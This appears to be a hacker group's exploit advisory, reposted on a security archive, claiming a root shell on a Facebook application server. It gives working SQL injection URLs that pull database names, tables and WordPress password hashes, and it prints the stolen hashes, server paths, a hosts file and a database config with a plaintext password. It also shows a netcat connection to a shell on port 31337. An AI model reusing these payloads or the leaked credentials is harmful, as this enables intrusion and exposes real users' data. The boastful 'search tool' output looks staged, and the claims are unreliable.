The Facebook Political Action application suffers from a remote SQL injection vulnerability that can in turn result in a full shell.
82c14ab9c9953a579378b5653467e8fbada6cb78c2bb527ce3aa13b46d034d50====================================================
FaceBook's servers was hacked again by Inj3ct0r Team
====================================================
Part 1 Original: http://inj3ct0r.com/exploits/11638
Part 2 Original: http://inj3ct0r.com/exploits/13403
[+] English translation
Inj3ct0r official website => Inj3ct0r.com
Inj3ct0r community => 0xr00t.com
__ __ ___
__ __ /'__`\ /\ \__ /'__`\
/\_\ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __ ___ ___ ___ ___
\/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ /'___\ / __`\ /' __` __`\
\ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ __/\ \__//\ \L\ \/\ \/\ \/\ \
\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\
\/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/_/\/____/\/___/ \/_/\/_/\/_/
\ \____/
\/___/
[0x00] [Introduction]
[0x01] [Search for bugs / crash]
[0x02] [0wner]
[0x03] [Conclusion]
[0x04] [Greetz]
__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\ \/\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
\ \ \_\ \/> </\ \ \_\ \ \ \_\ \
\ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Introduction]
In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
We did not change the main page, do not sell backup server does not delete files.
We have demonstrated the flaw in the system. Start =] ..
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Sir Zaid Personal RESPECT! y0u helped me in writing the article and find vulnerabilities
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
__ __ _
/'__`\ /'__`\ /' \
/\ \/\ \ __ _/\ \/\ \/\_, \
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \
\ \ \_\ \/> </\ \ \_\ \ \ \ \
\ \____//\_/\_\\ \____/ \ \_\
\/___/ \//\/_/ \/___/ \/_/
[Search for bugs / crash]
inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com
...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..
[+] found 13 vulns and 6 warning
[+] open 31337 port yes
[+] connect...
Brevity the soul of wit..
inj3ct0r.com@mybox [~]
inj3ct0r.com@host [~]# cd /home
inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com
...attack starting . . . . . . . . . .. . . .. . . . ..
__ __ ___
/'__`\ /'__`\ /'___`\
/\ \/\ \ __ _/\ \/\ \/\_\ /\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
\ \ \_\ \/> </\ \ \_\ \ // /_\ \
\ \____//\_/\_\\ \____//\______/
\/___/ \//\/_/ \/___/ \/_____/
[0wner]
Successful Shell on 31337 port . . . . .
inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337
...............................................................
apps.facebook@host [~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-[0x33]- Proofs
############
# REQUESTS #
############
;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1
;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1
admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1
admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--
admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz
################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php
;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com
politicsapp
5.0.45-log
;===== TABLES
# astro
** app
** oscache
** user
# candukincaid
** wp_commentmeta
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan
# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** postmeta
** posts
** term_relationships
** term_taxonomy
** terms
** usermeta
** users
# countdownapp
** oscache
** user
# crush
** couple
** oscache
** user
# dare
** flag
** game
** item
** user
# friendiq
** oscache
** score
** user
# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user
# hookup
** couple
** neverblue
** oscache
** user
# jauntlet
** user
# loccus
** checkin
** oscache
** user
# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# maps
** place
** user
# martisor
** user
# mediax
** oscache
** user
# mostlikely
** callback
** statement
** statementforuser
** user
# music
** itemforuser
** oscache
** user
# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle
# plans
** attend
** cache
** event
** place
** user
# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user
# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# projectbasecamp
** clicktimeproject
** clicktimereport
** clicktimetask
** idcorrelation
** projectbudget
** taskforuser
** user
# pwnfriends
** photo
** photoforfriend
** photoforuser
** user
# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user
# seeall
** network
** networkforuser
** test2
** userpref
# send
** app
** item
** itemforuser
** neverblue
** user
# supporter
** oscache
** user
# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user
# tomsapps
** ad
** adclick
** app
** contest
** notification
# travelbug
** bug
** bugcache
** user
# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user
# wikitravel
** badmap
** wikitravelimage
** wikitravelpage
---------------------------------------------------------------------------------------------------------------------------------------------------
read /etc/hosts
127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com
----------------------------------
/etc/my.cnf
#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 2
#master-host=69.63.180.15
#master-user=tomkincaid_user
#master-password=tomkincaid123
#master-connect-retry=50
replicate-do-db=miserman
#log-slave-updates
expire_logs_days = 14
goOd =] Nice Hacking old school xD
__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\_\L\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
\ \ \_\ \/> </\ \ \_\ \/\ \L\ \
\ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Conclusion]
There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)
__ __ __ __
/'__`\ /'__`\/\ \\ \
/\ \/\ \ __ _/\ \/\ \ \ \\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_
\ \ \_\ \/> </\ \ \_\ \ \__ ,__\
\ \____//\_/\_\\ \____/\/_/\_\_/
\/___/ \//\/_/ \/___/ \/_/
[Greetz]
Greetz all users Inj3ct0r.com and 31337 Inj3ct0r Members!
31337 Inj3ct0r Members:
cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,
Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..
----------------------------------------------------------------------------------------------
Personally h4x0rz:
Sir Zaid (none)
Dante90 http://inj3ct0r.com/author/916
SONiC http://inj3ct0r.com/author/2545
**RoAd_KiLlEr** http://inj3ct0r.com/author/2447
MasterGipy http://inj3ct0r.com/author/2346
You are good hackers. Respect y0u!
Sir Zaid, Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!
Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go http://inj3ct0r.com/links =]
At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook_part2.zip
We want to thank the following people for their contribution.
Do not forget to keep track of vulnerabilities in Inj3ct0r.com
H.A.C.K.T.I.V.I.S.M. WIN! =]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed